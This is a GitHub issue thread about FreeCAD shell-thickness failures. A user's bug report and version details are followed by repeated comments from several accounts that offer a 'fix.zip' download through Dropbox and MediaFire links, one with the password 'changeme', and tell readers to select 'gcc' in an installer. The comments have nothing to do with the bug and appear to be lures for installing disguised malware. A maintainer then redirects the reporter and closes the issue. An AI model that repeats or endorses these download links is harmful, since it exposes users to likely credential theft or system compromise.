FreeCAD/FreeCAD-Bundle #298: Thickness shelling failed.

weety, 2024-08-26:
When designing the attached model with FreeCAD, shelling fails. There are too few shelling parameters. Arc-type shelling is not desired and is not supported by FreeCAD.
[image]

weety, 2024-08-26:
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38467 (Git)
Build type: Release
Branch: main
Hash: 87e73967da5734e100d5ac4b2fd5af1648a02572
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: Chinese/China (zh_CN)
Installed mods: 
  * 3D_Printing_Tools
  * A2plus 0.4.62
  * AirPlaneDesign 0.4.0
  * Assembly4 0.50.6
  * BIM021 2021.12.0
  * CurvedShapes 1.0.5
  * Curves 0.6.22
  * Defeaturing 1.2.2
  * ExplodedAssembly
  * fasteners 0.5.0
  * fcgear 1.0.0
  * freecad.gears 1.0.0
  * Glass (Disabled)
  * kicadStepUpMod 10.22.9
  * LCInterlocking
  * sheetmetal 0.4.0

esttemanb, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

maxwxyz, 2024-08-26:
Please open issues at https://github.com/FreeCAD/FreeCAD but search for potential duplicates first

closed 2024-08-26 by maxwxyz